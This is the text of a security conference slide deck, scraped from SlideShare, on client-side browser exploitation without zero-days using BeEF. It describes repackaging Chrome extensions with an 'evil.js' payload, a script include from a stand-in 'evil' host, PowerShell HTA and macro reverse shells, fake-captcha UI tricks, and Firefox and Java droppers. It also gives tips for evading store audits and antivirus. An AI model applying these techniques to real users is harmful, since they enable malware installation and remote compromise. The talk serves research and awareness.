SlideShare a Scribd company logo
1 of 34
Download to read offline
When you don’t have 0days:
client-side exploitation for the masses
by yours truly
@kkotowicz & @antisnatchor
#whoarewe
@antisnatchor
Co-author of Browser
Hacker’s Handbook
BeEF lead core developer
Application Security researcher
Ruby, Javascript, OpenBSD and
BlackMetal fan
#whoarewe
@kkotowicz
Webappsec researcher
Attacks with HTML5
.. and browser extensions
Jazz & blues fan
Outline
Why there is still hope without 0days?
Exploiting Chrome Extensions
The good old HTA and Office macros
Abusing UI expectations on Internet Explorer
Old tricks still do work: Firefox Extensions
and Java Exploitation
Outro
Why there is still
hope without 0days?
Social Engineering
Human Stupidity
Code signing certificates and
CA trust misuse
Trust in Browser Extensions
Abuse of legacy functionality
Exploiting Chrome
Extensions
Extensions = super web applications
More privileges
from SOP bypasses
to universal XSS
to shell
They need to be installed
Lots of XSSes (but no 0days, sorry)
Exploiting Chrome
Extensions
Firefox
extensions run with full user privileges
install from any .xpi file
BeEF - Fake Flash Update
Exploiting Chrome
Extensions
Chrome
limited declared permissions
No OS command exec - NPAPI now deprecated
install from Chrome Web Store only
create & upload to Chrome Web Store
BeEF tools/chrome_extensions_exploitation
Exploiting Chrome
Extensions
CC + $5 + a Google account
https://chrome.google.com/webstore/
developer/dashboard
upload zip file with code
code reuse is good!
$ repacker-webstore.sh <original-ext-id> zip
repacked.zip evil.js “evil-permissions”
$ ruby webstore_upload.rb repacked.zip
publish
Exploiting Chrome
Extensions
XSS
ws: HTTP/S
x = new XMLHttpRequest();
x.open("GET", 'http://gmail.com',
false);
GET http://gmail.com
HTTP/1.1
Mosquito - efficient XSS<->HTTP proxy
https://github.com/koto/mosquito/
Exploiting Chrome
Extensions
Video demo: http://www.youtube.com/watch?
v=tdS0BDlzNis
Exploiting Chrome
Extensions
UXSS - attach <script src=//evil/eval.js?
location> to every tab
Exploiting Chrome
Extensions
Surviving Google Web Store audit & A/V
minimum permissions - tabs,<all_urls>
stay in content scripts - UXSS is enough
two-stage code execution
Disclaimer: This probably won’t scale
SocEng the user to install
Exploiting Chrome
Extensions
Video demo: http://www.youtube.com/watch?
v=VhqAWw4zRXk
The good old HTA and
Office macros
HTA, aka HTML applications
Lots of docs here: http://
msdn.microsoft.com/en-us/library/
ms536471(VS.85).aspx
Considered harmful?
A simple harmless HTA served by a Ruby app
server:
The good old HTA and
Office macros
In InternetExplorer 9/10 fully patched the
user see the following:
The good old HTA and
Office macros
Publisher: Microsoft Windows
Trick the user to Allow execution
You can get reverse shell with a classic
powershell payload (from Vista/Win7/Win8):
The good old HTA and
Office macros
Use powershell with Invoke-Expression (IEX)
The actual shellcode is retrieved from an
HTTP resource, and executed in memory
You can use either Metasploit
psh_web_delivery module or create your own
C#/shellcode mix with Veil-Evasion
You can also fingerprint the browser hooked
with BeEF to detect if the system is x86 or
x86_64, as the payload must be changed
The good old HTA and
Office macros
Avast or Avira Free versions don’t bother to
detect even default meterpreter shellcode
The good old HTA and
Office macros
You can achieve the same embedding the
powershell command inside a MS Office Macro
The attack is similar to HTA, and can also be
delivered from the browser
By default macros are disabled, but you can
use some social engineering tricks:
The good old HTA and
Office macros
More info on powershell attacks:
http://carnal0wnage.attackresearch.com/
2012/05/powershell-shellcode-metasploit-
x64.html
https://github.com/mattifestation/
PowerSploit/blob/master/CodeExecution/
Invoke-Shellcode.ps1
The good old HTA and
Office macros
Video demo: https://vimeo.com/89786258
Abusing UI
expectations on IE
Based on the research of my friend Rosario
Valotta: https://sites.google.com/site/
tentacoloviola/abusing-browsers-gui
Attack technique ported to BeEF
Social Engineering -> User Interface Abuse
Works perfectly on IE 9 and IE 10 (patched
in IE 11)
Abusing UI
expectations on IE
Internet Explorer 8 introduces modeless
notification bars (keyboard shortcuts ON)
IE 8 also introduces SmartScreen filter
(reputation based) for files served from the
browser:
Abusing UI
expectations on IE
An .exe file signed with Symantec EV-SSL
automatically gets a very high reputation
The yellow notification is a file that can
run, so the shortcut for Run is the R key
Abusing UI
expectations on IE
You can spawn a popunder that loads the
signed .exe same-origin, and focus keyboard
events on the popunder (it’s hidden but
doesn’t matter)
On the foreground window a Fake Captcha will
be enough to trick the user into pressing
[TAB] + R
Shortcuts change, so if the browser language
is Italian, the shortcut is E (Esegui)
The BeEF module supports multiple locales
Abusing UI
expectations on IE
Video demo: https://vimeo.com/89786257
Firefox Extensions &
Java Exploitation
There is no sandbox in Firefox
An extension has full control over the
browser and privileges of the browser in the
OS
You can read/write files, execute OS
commands, etc..
A bootstrapped extension doesn’t require FF
restart and can spawn a reverse shell when
installed
XPI file containing a Veil-encoded .exe
Firefox Extensions &
Java Exploitation
Pull request to Metasploit from Michael
Schierl more than 2 years ago:
https://github.com/rapid7/metasploit-
framework/pull/323
Ported to BeEF with some additional UI
spoofing tricks
Exploits -> Local Host -> Firefox droppers
Firefox Extensions &
Java Exploitation
Having code-signing certificates is the only
way to still use Java Applet attacks
Before Java 1.7 update 51, you could run
self-signed applets
(self)signed applets are not bounded by
the classic sandbox
you can execute commands and open sockets
In BeEF you can use: Exploits -> LocalHost->
Java Applet Dropper
Firefox Extensions &
Java Exploitation
Java 1.7 update 51 partially stops the fun
Click to Play (from update 11) on unsigned
applets, and no more self-signed applet fun
‘TIL the next CtP/sandbox bypass :D
Limitation of using Java applets nowadays:
Browser’s Click to Play (default deny on
the Java plugin as well sometimes)
Java’s Click to Play + valid-signed only
Firefox Extensions &
Java Exploitation
Video demo: https://vimeo.com/82779965
Outro
With some degree of magic trickery and
social engineering you can still obtain good
result without 0days
If the audience wants to share 0days with us
later, we’ll be happy and will listen to you
This talk has cost us 10 USD. We appreciate
donations :D
BeERS time

More Related Content

What's hot

Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFMichele Orru
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorialimlaurel2
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyoneVladimír Smitka
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Michele Orru
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Frameworkawiasecretary
 

What's hot (20)

Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEF
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
 
Exploiting Firefox Extensions
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox Extensions
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorial
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyone
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
BeEF
BeEFBeEF
BeEF
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpress
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Framework
 

Similar to When you don't have 0days: client-side exploitation for the masses

Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flashjoepangus
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworksphanleson
 
Building Web Sites that Work Everywhere
Building Web Sites that Work EverywhereBuilding Web Sites that Work Everywhere
Building Web Sites that Work EverywhereDoris Chen
 
Operations security (OPSEC) in IT
Operations security (OPSEC) in ITOperations security (OPSEC) in IT
Operations security (OPSEC) in ITMichal Špaček
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruMichele Orru
 
Using HttpWatch Plug-in with Selenium Automation in Java
Using HttpWatch Plug-in with Selenium Automation in JavaUsing HttpWatch Plug-in with Selenium Automation in Java
Using HttpWatch Plug-in with Selenium Automation in JavaSandeep Tol
 
Asp net mvc
Asp net mvcAsp net mvc
Asp net mvcbgrynko
 
Trabajo de jose
Trabajo de jose Trabajo de jose
Trabajo de jose josemgg
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bugvwchu
 
Nantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDE
Nantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDENantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDE
Nantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDEFlorent BENOIT
 
Internet browsers by Andres Haydar
Internet browsers by Andres HaydarInternet browsers by Andres Haydar
Internet browsers by Andres HaydarAndresHaydar
 
Browsers .
Browsers .Browsers .
Browsers .seripa3
 

Similar to When you don't have 0days: client-side exploitation for the masses (20)

Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flash
 
LVPHP.org
LVPHP.orgLVPHP.org
LVPHP.org
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
Building Web Sites that Work Everywhere
Building Web Sites that Work EverywhereBuilding Web Sites that Work Everywhere
Building Web Sites that Work Everywhere
 
News bytes Oct-2011
News bytes  Oct-2011News bytes  Oct-2011
News bytes Oct-2011
 
Operations security (OPSEC) in IT
Operations security (OPSEC) in ITOperations security (OPSEC) in IT
Operations security (OPSEC) in IT
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
FAT.Seminar.FOSS_Joomla!
FAT.Seminar.FOSS_Joomla!FAT.Seminar.FOSS_Joomla!
FAT.Seminar.FOSS_Joomla!
 
Using HttpWatch Plug-in with Selenium Automation in Java
Using HttpWatch Plug-in with Selenium Automation in JavaUsing HttpWatch Plug-in with Selenium Automation in Java
Using HttpWatch Plug-in with Selenium Automation in Java
 
Asp net mvc
Asp net mvcAsp net mvc
Asp net mvc
 
Trabajo de jose
Trabajo de jose Trabajo de jose
Trabajo de jose
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bug
 
Browsers
BrowsersBrowsers
Browsers
 
Browsers
BrowsersBrowsers
Browsers
 
Browsers
BrowsersBrowsers
Browsers
 
Php On Windows
Php On WindowsPhp On Windows
Php On Windows
 
Nantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDE
Nantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDENantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDE
Nantes Jug 2016 Eclipse Che: The Next-Gen Eclipse IDE
 
Internet browsers by Andres Haydar
Internet browsers by Andres HaydarInternet browsers by Andres Haydar
Internet browsers by Andres Haydar
 
Browsers .
Browsers .Browsers .
Browsers .
 

Recently uploaded

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Fact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMsFact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMsZilliz
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dashnarutouzumaki53779
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 

Recently uploaded (20)

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Fact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMsFact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMs
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dash
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 

When you don't have 0days: client-side exploitation for the masses

  • 1. When you don’t have 0days: client-side exploitation for the masses by yours truly @kkotowicz & @antisnatchor
  • 2. #whoarewe @antisnatchor Co-author of Browser Hacker’s Handbook BeEF lead core developer Application Security researcher Ruby, Javascript, OpenBSD and BlackMetal fan
  • 3. #whoarewe @kkotowicz Webappsec researcher Attacks with HTML5 .. and browser extensions Jazz & blues fan
  • 4. Outline Why there is still hope without 0days? Exploiting Chrome Extensions The good old HTA and Office macros Abusing UI expectations on Internet Explorer Old tricks still do work: Firefox Extensions and Java Exploitation Outro
  • 5. Why there is still hope without 0days? Social Engineering Human Stupidity Code signing certificates and CA trust misuse Trust in Browser Extensions Abuse of legacy functionality
  • 6. Exploiting Chrome Extensions Extensions = super web applications More privileges from SOP bypasses to universal XSS to shell They need to be installed Lots of XSSes (but no 0days, sorry)
  • 7. Exploiting Chrome Extensions Firefox extensions run with full user privileges install from any .xpi file BeEF - Fake Flash Update
  • 8. Exploiting Chrome Extensions Chrome limited declared permissions No OS command exec - NPAPI now deprecated install from Chrome Web Store only create & upload to Chrome Web Store BeEF tools/chrome_extensions_exploitation
  • 9. Exploiting Chrome Extensions CC + $5 + a Google account https://chrome.google.com/webstore/ developer/dashboard upload zip file with code code reuse is good! $ repacker-webstore.sh <original-ext-id> zip repacked.zip evil.js “evil-permissions” $ ruby webstore_upload.rb repacked.zip publish
  • 10. Exploiting Chrome Extensions XSS ws: HTTP/S x = new XMLHttpRequest(); x.open("GET", 'http://gmail.com', false); GET http://gmail.com HTTP/1.1 Mosquito - efficient XSS<->HTTP proxy https://github.com/koto/mosquito/
  • 11. Exploiting Chrome Extensions Video demo: http://www.youtube.com/watch? v=tdS0BDlzNis
  • 12. Exploiting Chrome Extensions UXSS - attach <script src=//evil/eval.js? location> to every tab
  • 13. Exploiting Chrome Extensions Surviving Google Web Store audit & A/V minimum permissions - tabs,<all_urls> stay in content scripts - UXSS is enough two-stage code execution Disclaimer: This probably won’t scale SocEng the user to install
  • 14. Exploiting Chrome Extensions Video demo: http://www.youtube.com/watch? v=VhqAWw4zRXk
  • 15. The good old HTA and Office macros HTA, aka HTML applications Lots of docs here: http:// msdn.microsoft.com/en-us/library/ ms536471(VS.85).aspx Considered harmful?
  • 16. A simple harmless HTA served by a Ruby app server:
  • 17. The good old HTA and Office macros In InternetExplorer 9/10 fully patched the user see the following:
  • 18. The good old HTA and Office macros Publisher: Microsoft Windows Trick the user to Allow execution You can get reverse shell with a classic powershell payload (from Vista/Win7/Win8):
  • 19. The good old HTA and Office macros Use powershell with Invoke-Expression (IEX) The actual shellcode is retrieved from an HTTP resource, and executed in memory You can use either Metasploit psh_web_delivery module or create your own C#/shellcode mix with Veil-Evasion You can also fingerprint the browser hooked with BeEF to detect if the system is x86 or x86_64, as the payload must be changed
  • 20. The good old HTA and Office macros Avast or Avira Free versions don’t bother to detect even default meterpreter shellcode
  • 21. The good old HTA and Office macros You can achieve the same embedding the powershell command inside a MS Office Macro The attack is similar to HTA, and can also be delivered from the browser By default macros are disabled, but you can use some social engineering tricks:
  • 22. The good old HTA and Office macros More info on powershell attacks: http://carnal0wnage.attackresearch.com/ 2012/05/powershell-shellcode-metasploit- x64.html https://github.com/mattifestation/ PowerSploit/blob/master/CodeExecution/ Invoke-Shellcode.ps1
  • 23. The good old HTA and Office macros Video demo: https://vimeo.com/89786258
  • 24. Abusing UI expectations on IE Based on the research of my friend Rosario Valotta: https://sites.google.com/site/ tentacoloviola/abusing-browsers-gui Attack technique ported to BeEF Social Engineering -> User Interface Abuse Works perfectly on IE 9 and IE 10 (patched in IE 11)
  • 25. Abusing UI expectations on IE Internet Explorer 8 introduces modeless notification bars (keyboard shortcuts ON) IE 8 also introduces SmartScreen filter (reputation based) for files served from the browser:
  • 26. Abusing UI expectations on IE An .exe file signed with Symantec EV-SSL automatically gets a very high reputation The yellow notification is a file that can run, so the shortcut for Run is the R key
  • 27. Abusing UI expectations on IE You can spawn a popunder that loads the signed .exe same-origin, and focus keyboard events on the popunder (it’s hidden but doesn’t matter) On the foreground window a Fake Captcha will be enough to trick the user into pressing [TAB] + R Shortcuts change, so if the browser language is Italian, the shortcut is E (Esegui) The BeEF module supports multiple locales
  • 28. Abusing UI expectations on IE Video demo: https://vimeo.com/89786257
  • 29. Firefox Extensions & Java Exploitation There is no sandbox in Firefox An extension has full control over the browser and privileges of the browser in the OS You can read/write files, execute OS commands, etc.. A bootstrapped extension doesn’t require FF restart and can spawn a reverse shell when installed XPI file containing a Veil-encoded .exe
  • 30. Firefox Extensions & Java Exploitation Pull request to Metasploit from Michael Schierl more than 2 years ago: https://github.com/rapid7/metasploit- framework/pull/323 Ported to BeEF with some additional UI spoofing tricks Exploits -> Local Host -> Firefox droppers
  • 31. Firefox Extensions & Java Exploitation Having code-signing certificates is the only way to still use Java Applet attacks Before Java 1.7 update 51, you could run self-signed applets (self)signed applets are not bounded by the classic sandbox you can execute commands and open sockets In BeEF you can use: Exploits -> LocalHost-> Java Applet Dropper
  • 32. Firefox Extensions & Java Exploitation Java 1.7 update 51 partially stops the fun Click to Play (from update 11) on unsigned applets, and no more self-signed applet fun ‘TIL the next CtP/sandbox bypass :D Limitation of using Java applets nowadays: Browser’s Click to Play (default deny on the Java plugin as well sometimes) Java’s Click to Play + valid-signed only
  • 33. Firefox Extensions & Java Exploitation Video demo: https://vimeo.com/82779965
  • 34. Outro With some degree of magic trickery and social engineering you can still obtain good result without 0days If the audience wants to share 0days with us later, we’ll be happy and will listen to you This talk has cost us 10 USD. We appreciate donations :D BeERS time